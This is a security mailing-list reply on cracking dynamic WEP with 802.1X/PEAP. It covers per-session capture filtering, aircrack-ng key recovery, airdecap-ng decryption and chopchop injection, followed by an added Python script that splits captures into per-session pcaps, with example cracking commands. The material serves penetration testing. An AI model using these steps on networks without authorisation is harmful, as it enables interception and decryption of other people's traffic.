PaulDotCom mailing list archives

Re: Advice on Attacking WEP Using 802.1X


From: Joshua Wright <jwright () hasborg com>
Date: Fri, 22 Oct 2010 13:04:03 -0400

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

On 10/21/2010 10:23 PM, Matt Neely wrote:
> Anyone have any advice on attacking a WEP network using 802.1X
> authentication?  From reviewing a packet capture it appears like the
> network is specifically using PEAP.  For PEAP I'd usually use OpenRADIUS
> with the WPE patch and a fake AP.  But the AP I have on hand does not
> support enterprise authentication with WEP.
>
> Any thoughts, advice or pointers?

Standard WEP cracking still applies, but you have to limit your packet
capture to one AP<->STA connection (wlan.addr eq [clientmac]) and within
one login session (look for unencrypted EAP frames to identify
reauthentication exchanges).

Despite being called "dynamic WEP", keys are not dynamically rotated, so
as long as the user is connected to the AP you can collect packets and
use them with aircrack-ng to recover the WEP key.  From there, you can't
connect to the network easily, but you can decrypt all the traffic with
airdecap-ng or Wireshark.

Also, consider using the Aireplay-ng chopchop attack to decrypt some
traffic, then use the keystream (.xor file) data with airtun-ng to
inject some packets of your own (one-way injection only).

- -Josh
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAkzBxAMACgkQapC4Te3oxYzMtwCgk3CL8vlW0F/T0TK1agVVwISa
26cAoJI747fAwqV9/Rcl15SF2yDnCdmz
=ffP6
-----END PGP SIGNATURE-----
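The capture-filtering step Josh describes (keep one client's frames, and cut at every unencrypted EAPOL/EAP exchange so each slice is encrypted under one dynamic-WEP session key) as a worked example. This is added code, not part of Josh's message or of the aircrack-ng project; it assumes a little-endian pcap with linktype 105 (raw 802.11, no radiotap header) and builds a small constructed capture inline so it runs offline. The MAC addresses, frame bodies and output filenames are made up for the example.

```python
"""Split an 802.11 capture into per-client, per-login-session WEP frames.

Added example (not from the original post). Implements the filter Josh
describes: keep frames for one client (wlan.addr eq <client>) and start a
new bucket at each unencrypted EAPOL/EAP exchange, so every output file
holds only frames encrypted under a single dynamic-WEP session key.
Assumes linktype 105 with no radiotap header.
"""
import struct

LINKTYPE_IEEE802_11 = 105
ETHERTYPE_EAPOL = b"\x88\x8e"
LLC_SNAP = b"\xaa\xaa\x03\x00\x00\x00"


def parse_pcap(data):
    """Return the list of raw 802.11 frames in a little-endian pcap."""
    magic, _maj, _min, _tz, _sig, _snap, link = struct.unpack("<IHHiIII", data[:24])
    if magic != 0xA1B2C3D4 or link != LINKTYPE_IEEE802_11:
        raise ValueError("expected little-endian pcap with linktype 105")
    frames, off = [], 24
    while off < len(data):
        _sec, _usec, incl, _orig = struct.unpack("<IIII", data[off:off + 16])
        frames.append(data[off + 16:off + 16 + incl])
        off += 16 + incl
    return frames


def write_pcap(frames):
    """Serialise frames back into a pcap that aircrack-ng/airdecap-ng accept."""
    out = struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_IEEE802_11)
    for i, f in enumerate(frames):
        out += struct.pack("<IIII", i, 0, len(f), len(f)) + f
    return out


def classify(frame):
    """For a data frame return (addresses, protected, is_eapol); else None."""
    if len(frame) < 24 or (frame[0] >> 2) & 0x3 != 2:   # type 2 == data
        return None
    addrs = {frame[4:10], frame[10:16], frame[16:22]}     # addr1..addr3
    protected = bool(frame[1] & 0x40)                     # Protected Frame bit
    body = frame[24:]
    is_eapol = (not protected and body.startswith(LLC_SNAP)
                and body[6:8] == ETHERTYPE_EAPOL)
    return addrs, protected, is_eapol


def split_sessions(frames, client_mac):
    """Group the client's WEP-protected frames by 802.1X login session."""
    sessions, current = [], []
    for f in frames:
        info = classify(f)
        if info is None:
            continue
        addrs, protected, is_eapol = info
        if client_mac not in addrs:      # wlan.addr eq <client>
            continue
        if is_eapol:
            # Unencrypted EAPOL after encrypted traffic == re-authentication;
            # the session key changes, so close the current bucket.
            if current:
                sessions.append(current)
                current = []
        elif protected:
            current.append(f)
    if current:
        sessions.append(current)
    return sessions


# ---- constructed sample capture (made up for this example) ----------------
AP = bytes.fromhex("001122334455")
STA = bytes.fromhex("aabbccddeeff")
OTHER = bytes.fromhex("0a0b0c0d0e0f")
EAPOL_START = LLC_SNAP + ETHERTYPE_EAPOL + b"\x01\x01\x00\x00"   # EAPOL-Start
EAP_REQ_ID = LLC_SNAP + ETHERTYPE_EAPOL + b"\x01\x00\x00\x05\x01\x01\x00\x05\x01"


def wep_body(n):
    """Fake WEP payload: 3-byte IV + key index byte + opaque ciphertext."""
    return bytes([n, 0, 0, 0]) + bytes([n]) * 40


def data_frame(sa, da, bssid, to_ds, body, protected=False):
    fc1 = (0x01 if to_ds else 0x02) | (0x40 if protected else 0)
    a1, a2, a3 = (bssid, sa, da) if to_ds else (da, bssid, sa)
    return bytes([0x08, fc1]) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + body


SAMPLE_CAPTURE = write_pcap([
    data_frame(STA, AP, AP, True, EAPOL_START),              # login #1
    data_frame(AP, STA, AP, False, EAP_REQ_ID),
    data_frame(STA, AP, AP, True, wep_body(1), protected=True),
    data_frame(AP, STA, AP, False, wep_body(2), protected=True),
    data_frame(OTHER, AP, AP, True, wep_body(3), protected=True),   # other client
    data_frame(STA, AP, AP, True, EAPOL_START),              # re-authentication
    data_frame(STA, AP, AP, True, wep_body(4), protected=True),
])


def session_pcaps(pcap_bytes, client_mac):
    """One pcap per login session, ready for aircrack-ng."""
    return [write_pcap(s) for s in split_sessions(parse_pcap(pcap_bytes), client_mac)]


if __name__ == "__main__":
    for i, blob in enumerate(session_pcaps(SAMPLE_CAPTURE, STA), 1):
        name = "client-session-%d.pcap" % i      # hypothetical output name
        open(name, "wb").write(blob)
        print("wrote", name, "->", len(parse_pcap(blob)), "WEP frames")
```

Each output file can then be fed to aircrack-ng on its own (for example `aircrack-ng -b 00:11:22:33:44:55 client-session-1.pcap`), and a recovered key applied with `airdecap-ng -w <hexkey>` to that same file only, since the next session uses a different key. On real captures taken with airodump-ng the frames carry a radiotap header that would need to be stripped (or the parser extended) before `classify` sees the 802.11 header; that case is not handled here.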
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com

